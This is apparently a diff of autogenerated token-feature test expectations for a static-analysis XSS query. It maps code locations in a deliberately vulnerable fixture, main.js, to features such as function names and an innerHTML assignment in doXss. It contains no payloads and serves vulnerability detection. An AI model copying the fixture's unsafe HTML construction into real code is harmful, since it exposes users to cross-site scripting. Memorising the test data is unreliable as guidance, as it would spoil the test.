autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:43:5 | constru ... ;\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:5:43:5 | constru ... ;\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:41:15 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:41:15 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:41:15 | this | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:41:15 | this | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:41:15 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | 'arguments' object of constructor of class Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | 'arguments' object of constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | 'arguments' object of constructor of class Foo | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | 'arguments' object of constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | 'arguments' object of constructor of class Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | (s) {\\n ... ;\\n } | assignedToPropName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | (s) {\\n ... ;\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | (s) {\\n ... ;\\n } | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | (s) {\\n ... ;\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | exceptional return of constructor of class Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | exceptional return of constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | exceptional return of constructor of class Foo | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | exceptional return of constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | exceptional return of constructor of class Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | return of constructor of class Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | return of constructor of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | return of constructor of class Foo | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | return of constructor of class Foo | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:16:43:5 | return of constructor of class Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:41:17:41:17 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:12 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:12 | this | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:12 | this | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:12 | this | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:12 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:17 | this.step | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:17 | this.step | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:17 | this.step | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:17 | this.step | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:17 | this.step | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:21 | this.step = s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:21 | this.step = s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:21 | this.step = s | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:21 | this.step = s | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:9:42:21 | this.step = s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:14:42:17 | step | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:14:42:17 | step | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:14:42:17 | step | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:14:42:17 | step | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:14:42:17 | step | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:21:42:21 | s | assignedToPropName | step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:21:42:21 | s | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:21:42:21 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:21:42:21 | s | enclosingFunctionBody | s step s | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:21:42:21 | s | enclosingFunctionName | constructor | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:42:21:42:21 | s | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:45:9 | doXss | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:45:9 | doXss | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:45:9 | doXss | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:48:5 | doXss() ... K\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:48:5 | doXss() ... K\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:48:5 | doXss() ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:48:5 | doXss() ... K\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:48:5 | doXss() ... K\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:5:48:5 | doXss() ... K\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:45:9 | this | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:45:9 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:45:9 | this | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:45:9 | this | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:45:9 | this | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | 'arguments' object of method doXss of class Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | 'arguments' object of method doXss of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | 'arguments' object of method doXss of class Foo | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | 'arguments' object of method doXss of class Foo | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | 'arguments' object of method doXss of class Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | () {\\n ... K\\n } | assignedToPropName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | () {\\n ... K\\n } | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | () {\\n ... K\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | () {\\n ... K\\n } | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | exceptional return of method doXss of class Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | exceptional return of method doXss of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | exceptional return of method doXss of class Foo | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | exceptional return of method doXss of class Foo | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | exceptional return of method doXss of class Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | return of method doXss of class Foo | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | return of method doXss of class Foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | return of method doXss of class Foo | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | return of method doXss of class Foo | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:45:10:48:5 | return of method doXss of class Foo | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:16 | document | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:16 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:16 | document | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:16 | document | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:16 | document | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:30 | documen ... elector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:30 | documen ... elector | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:30 | documen ... elector | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:30 | documen ... elector | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:30 | documen ... elector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | documen ... class") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | documen ... class") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | documen ... class") | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | documen ... class") | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | documen ... class") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | exceptional return of documen ... class") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | exceptional return of documen ... class") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | exceptional return of documen ... class") | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | exceptional return of documen ... class") | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:40 | exceptional return of documen ... class") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:50 | documen ... nerHTML | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:50 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:50 | documen ... nerHTML | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:50 | documen ... nerHTML | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:50 | documen ... nerHTML | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:85 | documen ... /span>" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:85 | documen ... /span>" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:85 | documen ... /span>" | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:85 | documen ... /span>" | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:9:47:85 | documen ... /span>" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:18:47:30 | querySelector | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:18:47:30 | querySelector | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:18:47:30 | querySelector | enclosingFunctionBody | document querySelector #class innerHTML step | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:18:47:30 | querySelector | enclosingFunctionName | doXss | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:18:47:30 | querySelector | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:32:47:39 | "#class" | CalleeFlexibleAccessPath | document.querySelector | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:32:47:39 | "#class" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:32:47:39 | "#class" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23014,30 +151920,270 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:47:32:47:39 | "#class" | 